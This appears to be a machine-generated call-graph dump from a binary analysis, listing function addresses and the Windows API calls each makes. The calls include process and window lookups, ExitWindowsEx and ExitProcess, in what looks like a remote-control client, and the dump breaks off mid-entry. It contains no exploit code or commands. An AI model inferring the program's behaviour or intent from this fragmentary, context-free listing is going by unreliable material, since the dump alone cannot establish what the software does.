11170c05 79 API calls 3 library calls 95113->95127 95114 1114519e 95114->95086 95115->95114 95128 111692ef 66 API calls __getptd_noexit 95115->95128 95118 111633ac 95117->95118 95124 111633f9 95117->95124 95129 1116b7b5 95118->95129 95121 111633d9 95121->95124 95149 11170744 68 API calls 6 library calls 95121->95149 95124->95107 95124->95113 95125->95110 95126->95114 95127->95113 95128->95114 95150 1116b73c GetLastError 95129->95150 95131 1116b7bd 95132 111633b1 95131->95132 95164 1116d7aa 66 API calls 3 library calls 95131->95164 95132->95121 95134 111704a8 95132->95134 95135 111704b4 __lseeki64 95134->95135 95136 1116b7b5 __getptd 66 API calls 95135->95136 95137 111704b9 95136->95137 95138 111704e7 95137->95138 95140 111704cb 95137->95140 95187 1117373c 95138->95187 95142 1116b7b5 __getptd 66 API calls 95140->95142 95141 111704ee 95194 1117045b 74 API calls 3 library calls 95141->95194 95144 111704d0 95142->95144 95147 111704de __lseeki64 95144->95147 95186 1116d7aa 66 API calls 3 library calls 95144->95186 95145 11170502 95195 11170515 LeaveCriticalSection _doexit 95145->95195 95147->95121 95149->95124 95165 1116b5fa TlsGetValue 95150->95165 95153 1116b7a9 SetLastError 95153->95131 95156 1116b76f DecodePointer 95157 1116b784 95156->95157 95158 1116b7a0 95157->95158 95159 1116b788 95157->95159 95161 11162be5 _free 62 API calls 95158->95161 95174 1116b688 66 API calls 4 library calls 95159->95174 95163 1116b7a6 95161->95163 95162 1116b790 GetCurrentThreadId 95162->95153 95163->95153 95166 1116b60f DecodePointer TlsSetValue 95165->95166 95167 1116b62a 95165->95167 95166->95167 95167->95153 95168 11169dbe 95167->95168 95171 11169dc7 95168->95171 95170 11169e04 95170->95153 95170->95156 95171->95170 95172 11169de5 Sleep 95171->95172 95175 11170166 95171->95175 95173 11169dfa 95172->95173 95173->95170 95173->95171 95174->95162 95176 11170172 95175->95176 95182 1117018d 95175->95182 95177 1117017e 95176->95177 95176->95182 95184 111692ef 66 API calls __getptd_noexit 95177->95184 95179 111701a0 RtlAllocateHeap 95181 111701c7 95179->95181 95179->95182 95180 11170183 95180->95171 95181->95171 95182->95179 95182->95181 95185 1116d4a8 DecodePointer 95182->95185 95184->95180 95185->95182 95188 11173764 EnterCriticalSection 95187->95188 95189 11173751 95187->95189 95188->95141 95196 1117367a 95189->95196 95191 11173757 95191->95188 95223 1116d7aa 66 API calls 3 library calls 95191->95223 95194->95145 95195->95144 95197 11173686 __lseeki64 95196->95197 95198 11173696 95197->95198 95199 111736ae 95197->95199 95224 1116d99d 66 API calls __NMSG_WRITE 95198->95224 95207 111736bc __lseeki64 95199->95207 95227 11169d79 95199->95227 95201 1117369b 95225 1116d7ee 66 API calls 6 library calls 95201->95225 95205 111736ce 95233 111692ef 66 API calls __getptd_noexit 95205->95233 95206 111736dd 95210 1117373c __lock 65 API calls 95206->95210 95207->95191 95208 111736a2 95226 1116d52d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 95208->95226 95212 111736e4 95210->95212 95214 11173717 95212->95214 95215 111736ec InitializeCriticalSectionAndSpinCount 95212->95215 95218 11162be5 _free 65 API calls 95214->95218 95216 11173708 95215->95216 95217 111736fc 95215->95217 95235 11173733 LeaveCriticalSection _doexit 95216->95235 95219 11162be5 _free 65 API calls 95217->95219 95218->95216 95221 11173702 95219->95221 95234 111692ef 66 API calls __getptd_noexit 95221->95234 95224->95201 95225->95208 95229 11169d82 95227->95229 95228 11162b51 _malloc 65 API calls 95228->95229 95229->95228 95230 11169db8 95229->95230 95231 11169d99 Sleep 95229->95231 95230->95205 95230->95206 95232 11169dae 95231->95232 95232->95229 95232->95230 95233->95207 95234->95216 95235->95207 95236->95090 95237->95093 95238->95097 95239->94571 95240 11115b70 95258 11145320 95240->95258 95243 11115bb5 95244 11115bc4 CoInitialize CoCreateInstance 95243->95244 95245 11115b98 95243->95245 95246 11115bf4 LoadLibraryA 95244->95246 95250 11115be9 95244->95250 95247 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 95245->95247 95249 11115c10 GetProcAddress 95246->95249 95246->95250 95251 11115ba6 95247->95251 95248 111450a0 std::_Mutex::_Mutex 90 API calls 95248->95243 95252 11115c20 SHGetSettings 95249->95252 95253 11115c34 FreeLibrary 95249->95253 95254 11115cd1 CoUninitialize 95250->95254 95255 11115cd7 95250->95255 95252->95253 95253->95250 95254->95255 95256 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 95255->95256 95257 11115ce6 95256->95257 95259 111450a0 std::_Mutex::_Mutex 90 API calls 95258->95259 95260 11115b8e 95259->95260 95260->95243 95260->95245 95260->95248 95261 11025d00 95262 11025d0e GetProcAddress 95261->95262 95263 11025d1f 95261->95263 95262->95263 95264 11025d38 95263->95264 95265 11025d2c K32GetProcessImageFileNameA 95263->95265 95267 11025d3e GetProcAddress 95264->95267 95268 11025d4f 95264->95268 95265->95264 95266 11025d71 95265->95266 95267->95268 95269 11025d56 95268->95269 95270 11025d67 SetLastError 95268->95270 95270->95266 95271 11173a35 95272 1116b7b5 __getptd 66 API calls 95271->95272 95273 11173a52 _LcidFromHexString 95272->95273 95274 11173a5f GetLocaleInfoA 95273->95274 95275 11173a86 95274->95275 95276 11173a92 95274->95276 95278 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 95275->95278 95294 111646ce 85 API calls 3 library calls 95276->95294 95280 11173c02 95278->95280 95279 11173a9e 95281 11173aa8 GetLocaleInfoA 95279->95281 95292 11173ad8 _CountryEnumProc@4 _strlen 95279->95292 95281->95275 95283 11173ac7 95281->95283 95282 11173b4b GetLocaleInfoA 95282->95275 95284 11173b6e 95282->95284 95295 111646ce 85 API calls 3 library calls 95283->95295 95297 111646ce 85 API calls 3 library calls 95284->95297 95287 11173ad2 95287->95292 95296 11163784 85 API calls 3 library calls 95287->95296 95289 11173b79 95289->95275 95291 11173b81 _strlen 95289->95291 95298 111646ce 85 API calls 3 library calls 95289->95298 95291->95275 95299 111739da GetLocaleInfoW _GetPrimaryLen _strlen 95291->95299 95292->95275 95292->95282 95294->95279 95295->95287 95296->95292 95297->95289 95298->95291 95299->95275 95300 1102e640 95301 1102e683 95300->95301 95302 1110f420 std::_Mutex::_Mutex 265 API calls 95301->95302 95303 1102e68a 95302->95303 95305 1102e6aa 95303->95305 96370 11142a60 95303->96370 95699 11142bb0 95305->95699 95308 1102e701 95311 11142bb0 86 API calls 95308->95311 95310 1102e6e6 95313 11081bb0 86 API calls 95310->95313 95312 1102e72a 95311->95312 95314 11162de7 std::_Mutex::_Mutex 79 API calls 95312->95314 95319 1102e737 95312->95319 95313->95308 95314->95319 95315 1102e766 95316 1102e7e5 CreateEventA 95315->95316 95317 1102e7bf GetSystemMetrics 95315->95317 95324 1102e805 95316->95324 95325 1102e819 95316->95325 95317->95316 95318 1102e7ce 95317->95318 95320 11146450 std::_Mutex::_Mutex 21 API calls 95318->95320 95319->95315 95322 111450a0 std::_Mutex::_Mutex 90 API calls 95319->95322 95323 1102e7d8 95320->95323 95322->95315 96388 1102d330 95323->96388 96532 11029450 265 API calls 2 library calls 95324->96532 95328 1110f420 std::_Mutex::_Mutex 265 API calls 95325->95328 95329 1102e820 95328->95329 95330 1102e840 95329->95330 95331 111100d0 426 API calls 95329->95331 95332 1110f420 std::_Mutex::_Mutex 265 API calls 95330->95332 95331->95330 95333 1102e854 95332->95333 95334 111100d0 426 API calls 95333->95334 95335 1102e874 95333->95335 95334->95335 95336 1110f420 std::_Mutex::_Mutex 265 API calls 95335->95336 95337 1102e8f3 95336->95337 95338 1102e923 95337->95338 96533 11060f70 301 API calls std::_Mutex::_Mutex 95337->96533 95340 1110f420 std::_Mutex::_Mutex 265 API calls 95338->95340 95341 1102e93d 95340->95341 95342 1102e962 FindWindowA 95341->95342 96534 11060be0 293 API calls std::_Mutex::_Mutex 95341->96534 95345 1102eab7 95342->95345 95346 1102e99b 95342->95346 95705 110613d0 95345->95705 95346->95345 95349 1102e9b3 GetWindowThreadProcessId 95346->95349 95351 11146450 std::_Mutex::_Mutex 21 API calls 95349->95351 95350 110613d0 268 API calls 95352 1102ead5 95350->95352 95353 1102e9d9 OpenProcess 95351->95353 95354 110613d0 268 API calls 95352->95354 95353->95345 95355 1102e9f9 95353->95355 95356 1102eae1 95354->95356 96535 11094b30 105 API calls 95355->96535 95358 1102eaf8 95356->95358 95359 1102eaef 95356->95359 95712 11145910 95358->95712 96536 11027d60 119 API calls 2 library calls 95359->96536 95360 1102ea18 95363 11146450 std::_Mutex::_Mutex 21 API calls 95360->95363 95366 1102ea2c 95363->95366 95364 1102eaf4 95364->95358 95365 1102eb07 95727 11144dc0 ExpandEnvironmentStringsA 95365->95727 95367 1102ea6b CloseHandle FindWindowA 95366->95367 95371 11146450 std::_Mutex::_Mutex 21 API calls 95366->95371 95368 1102ea93 GetWindowThreadProcessId 95367->95368 95369 1102eaa7 95367->95369 95368->95369 95372 11146450 std::_Mutex::_Mutex 21 API calls 95369->95372 95374 1102ea3e SendMessageA WaitForSingleObject 95371->95374 95375 1102eab4 95372->95375 95374->95367 95377 1102ea5e 95374->95377 95375->95345 95379 11146450 std::_Mutex::_Mutex 21 API calls 95377->95379 95378 1102eb2a 95396 1102ec01 95378->95396 95751 11062d60 95378->95751 95380 1102ea68 95379->95380 95380->95367 95766 110274c0 95396->95766 96597 11142ac0 95699->96597 95701 11142bc5 95702 1102e6d4 95701->95702 95703 11142ac0 IsDBCSLeadByte 95701->95703 95704 11165797 85 API calls std::_Mutex::_Mutex 95701->95704 95702->95308 96378 11081bb0 95702->96378 95703->95701 95704->95701 95706 11061446 95705->95706 95707 110613f7 95705->95707 95708 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 95706->95708 95707->95706 95710 11081bb0 86 API calls 95707->95710 96609 110612f0 268 API calls 4 library calls 95707->96609 95709 1102eac9 95708->95709 95709->95350 95710->95707 96610 11144bd0 95712->96610 95715 11144bd0 std::_Mutex::_Mutex 265 API calls 95716 11145947 wsprintfA 95715->95716 95717 11143230 std::_Mutex::_Mutex 8 API calls 95716->95717 95718 11145964 95717->95718 95719 11145990 95718->95719 95720 11143230 std::_Mutex::_Mutex 8 API calls 95718->95720 95721 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 95719->95721 95722 11145979 95720->95722 95723 1114599c 95721->95723 95722->95719 95724 11145980 95722->95724 95723->95365 95725 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 95724->95725 95726 1114598c 95725->95726 95726->95365 95728 11144df7 95727->95728 95729 11144e04 95728->95729 95730 11144e14 std::_Mutex::_Mutex 95728->95730 95731 11144e2e 95728->95731 95733 11142290 std::_Mutex::_Mutex 265 API calls 95729->95733 95734 11144e25 GetModuleFileNameA 95730->95734 95732 11144bd0 std::_Mutex::_Mutex 265 API calls 95731->95732 95735 11144e34 95732->95735 95736 11144e88 95733->95736 95734->95735 95737 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 95735->95737 95738 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 95736->95738 95737->95729 95739 1102eb18 95738->95739 95740 11143230 95739->95740 95741 11143251 CreateFileA 95740->95741 95743 111432ee CloseHandle 95741->95743 95744 111432ce 95741->95744 95747 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 95743->95747 95745 111432d2 CreateFileA 95744->95745 95746 1114330b 95744->95746 95745->95743 95745->95746 95749 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 95746->95749 95748 11143307 95747->95748 95748->95378 95750 1114331a 95749->95750 95750->95378 95752 1105dd10 79 API calls 95751->95752 95753 11062d88 95752->95753 96659 11061c90 95753->96659 97427 11060f40 95766->97427 96371 11142aa8 96370->96371 96374 11142a6e 96370->96374 96372 11142290 std::_Mutex::_Mutex 265 API calls 96371->96372 96373 11142ab0 96372->96373 96373->95305 96374->96371 96375 11142a92 96374->96375 99342 11142310 267 API calls std::_Mutex::_Mutex 96375->99342 96377 11142a98 96377->95305 96379 11081bbd 96378->96379 96380 11081bc2 96378->96380 99343 11081990 IsDBCSLeadByte 96379->99343 96382 11081bcb 96380->96382 96387 11081bdf 96380->96387 99344 111646ce 85 API calls 3 library calls 96382->99344 96384 11081bd8 96384->95310 96385 11081c43 96385->95310 96386 11165797 85 API calls std::_Mutex::_Mutex 96386->96387 96387->96385 96387->96386 96389 11146450 std::_Mutex::_Mutex 21 API calls 96388->96389 96390 1102d36c 96389->96390 96391 11145320 std::_Mutex::_Mutex 90 API calls 96390->96391 96392 1102d374 96391->96392 96393 1102d3a9 GetCurrentProcess SetPriorityClass 96392->96393 96394 1102d37d InterlockedIncrement 96392->96394 96397 1102d3dd 96393->96397 96394->96393 96395 1102d38c 96394->96395 96396 11146450 std::_Mutex::_Mutex 21 API calls 96395->96396 96398 1102d396 96396->96398 96399 1102d3e6 SetEvent 96397->96399 96403 1102d3ed 96397->96403 96400 1102d3a0 Sleep 96398->96400 96399->96403 96400->96400 96401 1102d424 96402 1102d452 96401->96402 99364 1109f1d0 273 API calls std::_Mutex::_Mutex 96401->99364 99365 11028e70 585 API calls std::_Mutex::_Mutex 96402->99365 96403->96401 99362 11029370 279 API calls 2 library calls 96403->99362 96407 1102d40d 99363 110ff6c0 278 API calls 2 library calls 96407->99363 96408 1102d463 99345 11028090 SetEvent 96408->99345 96411 1102d468 96412 1102d472 96411->96412 96413 1102d47d 96411->96413 99366 110ec980 898 API calls 96412->99366 96415 1102d49a 96413->96415 96416 1102d49f 96413->96416 99367 110594a0 SetEvent 96415->99367 96418 1102d4a7 96416->96418 96419 1102d4de 96416->96419 96418->96419 96426 1102d4d3 Sleep 96418->96426 96420 11146450 std::_Mutex::_Mutex 21 API calls 96419->96420 96421 1102d4e8 96420->96421 96422 1102d4f5 96421->96422 96423 1102d526 96421->96423 96422->96421 96424 1105dd10 79 API calls 96422->96424 96425 1102d523 96423->96425 96428 1102d58a 96423->96428 96429 1102d53f 96423->96429 96427 1102d518 96424->96427 96425->96423 96425->96428 96426->96419 96427->96423 99368 1102cff0 294 API calls std::_Mutex::_Mutex 96427->99368 99371 11026f20 6 API calls std::ios_base::_Ios_base_dtor 96428->99371 99346 110affa0 96429->99346 96434 1102d5cb 96436 1102d613 96434->96436 96439 1102d5f0 96434->96439 99373 1110f3a0 WaitForSingleObject 96434->99373 96442 1102d62d 96436->96442 96450 11146450 std::_Mutex::_Mutex 21 API calls 96436->96450 96438 1102d5af PostThreadMessageA 99372 1110f3a0 WaitForSingleObject 96438->99372 99374 11059400 DeleteCriticalSection CloseHandle 96439->99374 96441 1102d56a 96457 1102d57d std::ios_base::_Ios_base_dtor 96441->96457 99370 111352b0 299 API calls 5 library calls 96441->99370 96448 1102d66b 96442->96448 99375 11105420 26 API calls std::_Mutex::_Mutex 96442->99375 96447 1102d681 96456 11146450 std::_Mutex::_Mutex 21 API calls 96447->96456 96448->96447 96455 11075d10 847 API calls 96448->96455 96449 1102d590 96449->96434 96449->96438 96450->96442 96452 1102d661 99376 11107b50 663 API calls std::_Mutex::_Mutex 96452->99376 96455->96447 96460 1102d68b 96456->96460 99394 1100d4e0 FreeLibrary 96457->99394 96459 1102d889 96462 1102d8a0 96459->96462 99395 1100d200 wsprintfA 96459->99395 96463 1113cc30 311 API calls 96460->96463 96461 1102d666 99377 11105ac0 347 API calls std::_Mutex::_Mutex 96461->99377 96470 1102d8c7 GetModuleFileNameA GetFileAttributesA 96462->96470 96483 1102d9e3 96462->96483 96464 1102d690 96463->96464 96468 11146450 std::_Mutex::_Mutex 21 API calls 96464->96468 96471 1102d69a 96468->96471 96469 1102d895 96472 11146450 std::_Mutex::_Mutex 21 API calls 96469->96472 96473 1102d8ef 96470->96473 96470->96483 96480 1102d6ae std::ios_base::_Ios_base_dtor 96471->96480 99378 1109d920 WaitForSingleObject SetEvent WaitForSingleObject CloseHandle 96471->99378 96472->96462 96475 1110f420 std::_Mutex::_Mutex 265 API calls 96473->96475 96474 11146450 std::_Mutex::_Mutex 21 API calls 96477 1102da92 96474->96477 96479 1102d8f6 96475->96479 99398 11146410 FreeLibrary 96477->99398 96478 11146450 std::_Mutex::_Mutex 21 API calls 96482 1102d6c1 96478->96482 96485 11142a60 267 API calls 96479->96485 96496 1102d918 96479->96496 96480->96478 96493 1102d6d5 std::ios_base::_Ios_base_dtor 96482->96493 99379 1110e5c0 DeleteCriticalSection std::ios_base::_Ios_base_dtor 96482->99379 96483->96474 96484 1102da9a 96486 1102dad6 96484->96486 96491 1102dac4 ExitWindowsEx 96484->96491 96492 1102dab4 ExitWindowsEx Sleep 96484->96492 96485->96496 96488 1102dae6 96486->96488 96489 1102dadb Sleep 96486->96489 96494 11146450 std::_Mutex::_Mutex 21 API calls 96488->96494 96489->96488 96490 1102d74f 96501 1102d760 std::ios_base::_Ios_base_dtor 96490->96501 99382 1110fc70 278 API calls 2 library calls 96490->99382 96491->96486 96492->96491 96493->96490 99380 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor 96493->99380 96497 1102daf0 ExitProcess 96494->96497 96499 11142bb0 86 API calls 96496->96499 96503 1102d93d 96499->96503 96523 1102d7d9 std::ios_base::_Ios_base_dtor 96501->96523 99383 1110fc70 278 API calls 2 library calls 96501->99383 96502 11146450 std::_Mutex::_Mutex 21 API calls 96504 1102d7ec 96502->96504 96503->96483 96506 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 96503->96506 96505 1102d809 CloseHandle 96504->96505 99384 1108a570 96504->99384 96507 1102d824 96505->96507 96508 1102d82a 96505->96508 96511 1102d953 96506->96511 96513 11162be5 _free 66 API calls 96507->96513 96508->96457 99391 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor 96508->99391 96509 11146450 std::_Mutex::_Mutex 21 API calls 96522 1102d6ff std::ios_base::_Ios_base_dtor 96509->96522 96512 1102d96e _memset 96511->96512 99396 11029450 265 API calls 2 library calls 96511->99396 96517 1102d988 FindFirstFileA 96512->96517 96513->96508 96514 1102d800 std::ios_base::_Ios_base_dtor 96514->96505 96519 1102d9d4 96517->96519 96520 1102d9a8 FindNextFileA 96517->96520 99397 111266e0 291 API calls 5 library calls 96519->99397 96530 1102d9c8 FindClose 96520->96530 96521 1102d858 96521->96457 99393 1110fc70 278 API calls 2 library calls 96521->99393 96522->96490 96522->96509 99381 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor 96522->99381 96523->96502 96524 11162be5 _free 66 API calls 96527 1102d83c 96524->96527 96527->96521 96527->96524 99392 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor 96527->99392 96530->96519 96533->95338 96534->95342 96535->95360 96536->95364 96598 11142ad6 96597->96598 96599 11142b93 96598->96599 96604 11081a70 96598->96604 96599->95701 96601 11142afb 96602 11081a70 IsDBCSLeadByte 96601->96602 96603 11142b2b _memmove 96602->96603 96603->95701 96605 11081a7c 96604->96605 96607 11081a81 std::_Mutex::_Mutex __mbschr_l 96604->96607 96608 11081990 IsDBCSLeadByte 96605->96608 96607->96601 96608->96607 96609->95707 96611 11144bf2 96610->96611 96615 11144c09 std::_Mutex::_Mutex 96610->96615 96656 11029450 265 API calls 2 library calls 96611->96656 96614 11144d97 96616 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 96614->96616 96615->96614 96617 11144c3c GetModuleFileNameA 96615->96617 96618 11144db3 wsprintfA 96616->96618 96634 11081b40 96617->96634 96618->95715 96620 11144c51 96621 11144c61 SHGetFolderPathA 96620->96621 96633 11144d48 96620->96633 96622 11144c8e 96621->96622 96626 11144cad SHGetFolderPathA 96621->96626 96625 11144c94 96622->96625 96622->96626 96623 11142290 std::_Mutex::_Mutex 262 API calls 96623->96614 96657 11029450 265 API calls 2 library calls 96625->96657 96627 11144ce2 std::_Mutex::_Mutex 96626->96627 96630 1102a620 std::_Mutex::_Mutex 145 API calls 96627->96630 96631 11144cf3 96630->96631 96631->96631 96638 11144670 96631->96638 96633->96623 96636 11081b53 _strrchr 96634->96636 96635 11081b6a std::_Mutex::_Mutex 96635->96620 96636->96635 96658 11081990 IsDBCSLeadByte 96636->96658 96639 111446fa 96638->96639 96640 1114467b 96638->96640 96639->96633 96640->96639 96641 1114468b GetFileAttributesA 96640->96641 96642 111446a5 96641->96642 96643 11144697 96641->96643 96644 11163cf8 __strdup 66 API calls 96642->96644 96643->96633 96645 111446ac 96644->96645 96646 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 96645->96646 96647 111446b6 96646->96647 96648 11144670 std::_Mutex::_Mutex 67 API calls 96647->96648 96654 111446d3 96647->96654 96649 111446c6 96648->96649 96650 111446dc 96649->96650 96651 111446ce 96649->96651 96653 11162be5 _free 66 API calls 96650->96653 96652 11162be5 _free 66 API calls 96651->96652 96652->96654 96655 111446e1 CreateDirectoryA 96653->96655 96654->96633 96655->96654 96658->96635 96780 11144ea0 96659->96780 96661 11061d1c 96662 110d1550 268 API calls 96661->96662 96663 11061d30 96662->96663 96664 11061f17 96663->96664 96717 11061d44 std::ios_base::_Ios_base_dtor 96663->96717 96789 1116449d 96663->96789 96666 1116449d _fgets 81 API calls 96664->96666 96665 11062c88 96667 110d07c0 265 API calls 96665->96667 96670 11061f31 96666->96670 96706 11061e11 std::ios_base::_Ios_base_dtor 96667->96706 96669 11163db7 std::_Mutex::_Mutex 102 API calls 96669->96665 96674 11061f97 _strpbrk 96670->96674 96675 11061f38 96670->96675 96808 11163676 96674->96808 96676 11061f7d 96675->96676 96681 11163db7 std::_Mutex::_Mutex 102 API calls 96675->96681 96680 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 96681->96676 96706->96680 96717->96665 96717->96669 96782 11144eb3 std::ios_base::_Ios_base_dtor 96780->96782 96781 11144dc0 267 API calls 96781->96782 96782->96781 96784 11144ed5 GetLastError 96782->96784 96785 11144f1a std::ios_base::_Ios_base_dtor 96782->96785 96881 11163fed 96782->96881 96784->96782 96786 11144ee0 Sleep 96784->96786 96785->96661 96787 11163fed std::_Mutex::_Mutex 143 API calls 96786->96787 96788 11144ef2 96787->96788 96788->96782 96788->96785 96790 111644a9 __lseeki64 96789->96790 96791 111644bc 96790->96791 96792 111644ed 96790->96792 97253 111692ef 66 API calls __getptd_noexit 96791->97253 96798 111644cc __lseeki64 96792->96798 97227 1116af99 96792->97227 96794 111644c1 96884 11163f31 96881->96884 96883 11163fff 96883->96782 96887 11163f3d __lseeki64 96884->96887 96885 11163f50 96942 111692ef 66 API calls __getptd_noexit 96885->96942 96887->96885 96889 11163f7d 96887->96889 96888 11163f55 96943 1116df04 11 API calls __lseeki64 96888->96943 96903 111716f8 96889->96903 96900 11163f60 __lseeki64 @_EH4_CallFilterFunc@8 96900->96883 96904 11171704 __lseeki64 96903->96904 96905 1117373c __lock 66 API calls 96904->96905 96918 11171712 96905->96918 96907 1117178e 96915 1117367a __mtinitlocknum 66 API calls 96915->96918 96918->96907 96918->96915 96942->96888 96943->96900 97253->96794 97431 11060e40 97427->97431 97442 11060760 97431->97442 97443 1110f420 std::_Mutex::_Mutex 265 API calls 97442->97443 97444 1106077c 97443->97444 97445 110607c5 97444->97445 97446 11060783 97444->97446 97501 1116219a 66 API calls std::exception::_Copy_str 97445->97501 97494 1105e300 97446->97494 97449 110607bb 97453 110607f0 97449->97453 97450 110607d4 97502 111625f1 RaiseException 97450->97502 97452 110607e9 97495 1105e311 LeaveCriticalSection 97494->97495 97496 1105e31b 97494->97496 97495->97496 97497 1105e32f 97496->97497 97498 11162be5 _free 66 API calls 97496->97498 97499 1105e375 97497->97499 97500 1105e339 EnterCriticalSection 97497->97500 97498->97497 97499->97449 97500->97449 97501->97450 97502->97452 99342->96377 99343->96380 99344->96384 99345->96411 99399 110805f0 99346->99399 99351 1102d54a 99355 110eb080 99351->99355 99352 110affe7 99411 11029450 265 API calls 2 library calls 99352->99411 99356 110affa0 267 API calls 99355->99356 99357 110eb0ad 99356->99357 99427 110ea450 99357->99427 99361 1102d555 99369 110b0190 267 API calls std::_Mutex::_Mutex 99361->99369 99362->96407 99363->96401 99364->96402 99365->96408 99366->96413 99367->96416 99368->96425 99369->96441 99370->96457 99371->96449 99372->96449 99373->96434 99375->96452 99376->96461 99377->96448 99379->96493 99380->96522 99381->96522 99382->96501 99383->96523 99385 1108a617 99384->99385 99389 1108a5aa std::ios_base::_Ios_base_dtor 99384->99389 99386 1108a61e DeleteCriticalSection 99385->99386 99440 1106e1b0 99386->99440 99388 1108a5be CloseHandle 99388->99389 99389->99385 99389->99388 99390 1108a644 std::ios_base::_Ios_base_dtor 99390->96514 99391->96527 99392->96527 99393->96457 99394->96459 99395->96469 99397->96483 99398->96484 99400 11080614 99399->99400 99401 11080618 99400->99401 99402 1108062f 99400->99402 99412 11029450 265 API calls 2 library calls 99401->99412 99404 11080648 99402->99404 99405 1108062c 99402->99405 99408 110aff90 99404->99408 99405->99402 99413 11029450 265 API calls 2 library calls 99405->99413 99414 110812d0 99408->99414 99415 110812f1 99414->99415 99416 1108131d 99414->99416 99415->99416 99417 1108130b 99415->99417 99418 1108136a wsprintfA 99416->99418 99419 11081345 wsprintfA 99416->99419 99420 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 99417->99420 99426 11029450 265 API calls 2 library calls 99418->99426 99419->99416 99422 11081319 99420->99422 99422->99351 99422->99352 99429 110ea45b 99427->99429 99428 110ea4f5 99437 110b0190 267 API calls std::_Mutex::_Mutex 99428->99437 99429->99428 99430 110ea47e 99429->99430 99431 110ea495 99429->99431 99438 11029450 265 API calls 2 library calls 99430->99438 99433 110ea492 99431->99433 99434 110ea4c2 SendMessageTimeoutA 99431->99434 99433->99431 99439 11029450 265 API calls 2 library calls 99433->99439 99434->99428 99437->99361 99443 1106e1c4 99440->99443 99441 1106e1c8 99441->99390 99443->99441 99444 1106d9a0 67 API calls 2 library calls 99443->99444 99444->99443 99459 11134d10 99460 11134d48 99459->99460 99461 11134d19 99459->99461 99462 11145320 std::_Mutex::_Mutex 90 API calls 99461->99462 99463 11134d1e 99462->99463 99463->99460 99464 11132bf0 274 API calls 99463->99464 99465 11134d27 99464->99465 99465->99460 99466 1105dd10 79 API calls 99465->99466 99466->99460 99467 110310c0 99468 110310ce 99467->99468 99469 11145e80 268 API calls 99468->99469 99470 110310df SetUnhandledExceptionFilter 99469->99470 99471 110310ef std::_Mutex::_Mutex 99470->99471 99472 11040860 99473 11040892 99472->99473 99474 11040898 99473->99474 99481 110408b4 99473->99481 99475 110facc0 15 API calls 99474->99475 99477 110408aa CloseHandle 99475->99477 99476 110409c8 99478 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 99476->99478 99477->99481 99480 110409d5 99478->99480 99479 11040948 99494 110facc0 GetTokenInformation 99479->99494 99481->99476 99484 110408ed 99481->99484 99504 11087ee0 297 API calls 5 library calls 99481->99504 99484->99476 99484->99479 99485 1104095a 99486 11040962 CloseHandle 99485->99486 99490 11040969 99485->99490 99486->99490 99487 110409ab 99488 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 99487->99488 99491 110409c4 99488->99491 99489 11040991 99492 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 99489->99492 99490->99487 99490->99489 99493 110409a7 99492->99493 99495 110fad08 99494->99495 99496 110facf7 99494->99496 99505 110f1f50 9 API calls 99495->99505 99498 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 99496->99498 99500 110fad04 99498->99500 99499 110fad2c 99499->99496 99501 110fad34 99499->99501 99500->99485 99502 11161d01 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 99501->99502 99503 110fad5a 99502->99503 99503->99485 99504->99484 99505->99499 99506 a51020 GetCommandLineA 99507 a51035 GetStartupInfoA 99506->99507 99509 a51090 GetModuleHandleA 99507->99509 99510 a5108b 99507->99510 99513 a51000 _NSMClient32 99509->99513 99510->99509 99512 a510a2 ExitProcess 99513->99512 99514 11089a40 99515 1110f6c0 ___DllMainCRTStartup 4 API calls 99514->99515 99516 11089a53 99515->99516 99517 11089a5d 99516->99517 99526 11089150 268 API calls std::_Mutex::_Mutex 99516->99526 99519 11089a84 99517->99519 99527 11089150 268 API calls std::_Mutex::_Mutex 99517->99527 99522 11089a93 99519->99522 99523 11089a10 99519->99523 99528 110896a0 99523->99528 99526->99517 99527->99519 99569 11088970 6 API calls ___DllMainCRTStartup 99528->99569 99530 110896d9 GetParent 99531 110896ec 99530->99531 99532 110896fd 99530->99532 99533 110896f0 GetParent 99531->99533 99534 11144dc0 267 API calls 99532->99534 99533->99532 99533->99533 99535 11089709 99534->99535 99536 11163fed std::_Mutex::_Mutex 143 API calls 99535->99536 99537 11089716 std::ios_base::_Ios_base_dtor 99536->99537 99538 11144dc0 267 API calls 99537->99538 99539 